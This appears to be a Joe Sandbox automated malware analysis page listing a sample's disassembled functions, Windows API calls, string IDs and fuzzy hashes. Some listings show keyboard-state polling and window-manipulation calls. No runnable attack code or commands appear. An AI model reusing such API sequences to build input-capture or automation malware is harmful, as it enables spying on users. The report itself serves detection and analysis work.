                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: __wcsicoll$ClassMessageNameParentSend
                                                                                                                                                                                                                • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                                                                                                • API String ID: 3125838495-3381328864
                                                                                                                                                                                                                • Opcode ID: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                                                                                                                                                                                • Instruction ID: b9a51c7f116d0e73852bd225d20f6d8bcb5f39b8f57bd3164038c04ed7d94027
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C6110AB1E447017BFE10BA659D46EBB339C9B54B11F00051BFE44D7242F6ACA94147A9
                                                                                                                                                                                                                Function 004491B9 Relevance: 19.7, APIs: 13, Instructions: 246windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
                                                                                                                                                                                                                • SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
                                                                                                                                                                                                                • CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
                                                                                                                                                                                                                • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
                                                                                                                                                                                                                • SendMessageW.USER32(?,?,00000000,?), ref: 00449332
                                                                                                                                                                                                                • SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
                                                                                                                                                                                                                • SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
                                                                                                                                                                                                                • SendMessageW.USER32(?,00000402,?), ref: 00449399
                                                                                                                                                                                                                • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
                                                                                                                                                                                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: MessageSend$CharNext
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1350042424-0
                                                                                                                                                                                                                • Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                                                                                                                                                                                • Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4
                                                                                                                                                                                                                Function 00478656 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 197COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                                                                                                                                                                                  • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                                                                                                                                                                                • GetDriveTypeW.KERNEL32(?), ref: 004787B9
                                                                                                                                                                                                                • _wcscpy.LIBCMT ref: 004787E5
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                                                                                                                                                                                                                • String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                                                                                                • API String ID: 3052893215-2127371420
                                                                                                                                                                                                                • Opcode ID: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                                                                                                                                                                                • Instruction ID: 541bc2b2506c052d744bcb7e7e177e26c036821b53f5a58429f0f0853ea8de24
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4761C1716443018BD700EF14CC85B9BB7D4AB84348F14892FF949AB382DB79E94987AB
                                                                                                                                                                                                                Function 0045E737 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 163COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
                                                                                                                                                                                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                                                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                                                                                • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
                                                                                                                                                                                                                • __swprintf.LIBCMT ref: 0045E7F7
                                                                                                                                                                                                                • _wprintf.LIBCMT ref: 0045E8B3
                                                                                                                                                                                                                • _wprintf.LIBCMT ref: 0045E8D7
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                                                                                                                                                                                • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                                                                                                                • API String ID: 2295938435-2354261254
                                                                                                                                                                                                                • Opcode ID: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                                                                                                                                                                                • Instruction ID: 453f5dd12ee62c270a242db3517b58e8b6225e49c0ff470bc5072f32437c925c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6A519E71A10219ABDB14EB91CC85EEF7778AF44314F14407EF90477292DB78AE49CBA8
                                                                                                                                                                                                                Function 004531B1 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 160COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: __swprintf_wcscpy$__i64tow__itow
                                                                                                                                                                                                                • String ID: %.15g$0x%p$False$True
                                                                                                                                                                                                                • API String ID: 3038501623-2263619337
                                                                                                                                                                                                                • Opcode ID: dbd07ee36d68efbdb82b47f6bbdb5a558a403895529f1bd62c5843a789ef215e
                                                                                                                                                                                                                • Instruction ID: fd507a47f7d2c8f7f5848ea17d112ce969af4838d766d220e6d3988dad71e25c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: dbd07ee36d68efbdb82b47f6bbdb5a558a403895529f1bd62c5843a789ef215e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 264108729001005BDB10EF75DC42FAAB364EF55306F0445ABFE09CB242EA39DA48C79A
                                                                                                                                                                                                                Function 0045E538 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 154COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                                                                                                                                                                                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                                                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                                                                                • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                                                                                                                                                                                                                • __swprintf.LIBCMT ref: 0045E5F6
                                                                                                                                                                                                                • _wprintf.LIBCMT ref: 0045E6A3
                                                                                                                                                                                                                • _wprintf.LIBCMT ref: 0045E6C7
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                                                                                                                                                                                • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                                                                                                                • API String ID: 2295938435-8599901
                                                                                                                                                                                                                • Opcode ID: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                                                                                                                                                                                • Instruction ID: ff3e2b23dced8a629e5b21f12e79e468b5cd48208a3d74017576322ff0354a8f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9A519171D00109ABDB14EBA1C845EEF7778EF44304F50847EF91477292EA78AE49CBA8
                                                                                                                                                                                                                Function 00443B61 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 99sleepwindowtimeCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • timeGetTime.WINMM ref: 00443B67
                                                                                                                                                                                                                  • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
                                                                                                                                                                                                                • Sleep.KERNEL32(0000000A), ref: 00443B9F
                                                                                                                                                                                                                • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00443BC8
                                                                                                                                                                                                                • SetActiveWindow.USER32(?), ref: 00443BEC
                                                                                                                                                                                                                • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
                                                                                                                                                                                                                • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00443C22
                                                                                                                                                                                                                • Sleep.KERNEL32(000000FA), ref: 00443C2D
                                                                                                                                                                                                                • IsWindow.USER32(?), ref: 00443C3A
                                                                                                                                                                                                                • EndDialog.USER32(?,00000000), ref: 00443C4C
                                                                                                                                                                                                                  • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                                                                                                                                                                                  • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                                                                                                                                                                                  • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                                                                                                                                                                                • EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
                                                                                                                                                                                                                • String ID: BUTTON
                                                                                                                                                                                                                • API String ID: 1834419854-3405671355
                                                                                                                                                                                                                • Opcode ID: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                                                                                                                                                                                • Instruction ID: 3c6370bb7d17ad47abda0b7088cfd3672c19e1ca6c3f529de1b12449ce3ad6f8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6B31E676784200BFE3349F74FD99F5A3B58AB55B22F10083AF600EA2A1D6B5A441876C
                                                                                                                                                                                                                Function 00454014 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 93windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                                                                                                                                                                                                                • LoadStringW.USER32(00000000), ref: 00454040
                                                                                                                                                                                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                                                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                                                                                • _wprintf.LIBCMT ref: 00454074
                                                                                                                                                                                                                • __swprintf.LIBCMT ref: 004540A3
                                                                                                                                                                                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
                                                                                                                                                                                                                • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                                                                                                                • API String ID: 455036304-4153970271
                                                                                                                                                                                                                • Opcode ID: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                                                                                                                                                                                • Instruction ID: e2f14448b15a7dab571624068eda089460c560eca1c8ebe4dd0daaccfe0aa2c5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3B31E872B0011997CB00EF95CD069AE3378AF88714F50445EFA0877282D678AE45C7A9
                                                                                                                                                                                                                Function 00467C8E Relevance: 18.3, APIs: 12, Instructions: 310COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
                                                                                                                                                                                                                • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
                                                                                                                                                                                                                • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
                                                                                                                                                                                                                • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
                                                                                                                                                                                                                • _memmove.LIBCMT ref: 00467EB8
                                                                                                                                                                                                                • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
                                                                                                                                                                                                                • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
                                                                                                                                                                                                                • _memmove.LIBCMT ref: 00467F6C
                                                                                                                                                                                                                • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
                                                                                                                                                                                                                • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
                                                                                                                                                                                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                                                                                                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                                                                                                                                  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                                                                                                                                • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
                                                                                                                                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                                                                                • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2170234536-0
                                                                                                                                                                                                                • Opcode ID: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                                                                                                                                                                                                • Instruction ID: 6369f5c3f22445f0d5bf5c4520e4337682cbd46778e63a39b460943b9460954a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 26B124716042059FD700CF59D884BAEB7B5FF88308F24856EEA05DB351EB3AD845CB6A
                                                                                                                                                                                                                Function 00453C57 Relevance: 18.2, APIs: 12, Instructions: 190keyboardCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetKeyboardState.USER32(?), ref: 00453CE0
                                                                                                                                                                                                                • SetKeyboardState.USER32(?), ref: 00453D3B
                                                                                                                                                                                                                • GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
                                                                                                                                                                                                                • GetKeyState.USER32(000000A0), ref: 00453D75
                                                                                                                                                                                                                • GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
                                                                                                                                                                                                                • GetKeyState.USER32(000000A1), ref: 00453DB5
                                                                                                                                                                                                                • GetAsyncKeyState.USER32(00000011), ref: 00453DE1
                                                                                                                                                                                                                • GetKeyState.USER32(00000011), ref: 00453DEF
                                                                                                                                                                                                                • GetAsyncKeyState.USER32(00000012), ref: 00453E18
                                                                                                                                                                                                                • GetKeyState.USER32(00000012), ref: 00453E26
                                                                                                                                                                                                                • GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
                                                                                                                                                                                                                • GetKeyState.USER32(0000005B), ref: 00453E5D
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: State$Async$Keyboard
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 541375521-0
                                                                                                                                                                                                                • Opcode ID: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                                                                                                                                                                                • Instruction ID: 009fbf1908f75ed0a62addf5985db529f64a747a45b1090b1102dc3b9208550d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                                                                                                                                                                                • Instruction Fuzzy Hash: BC61DD3190478829FB329F6488057EBBBF45F12346F08459ED9C2162C3D7AC6B4CCB65
                                                                                                                                                                                                                Function 004357B7 Relevance: 18.2, APIs: 12, Instructions: 184COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000001), ref: 004357DB
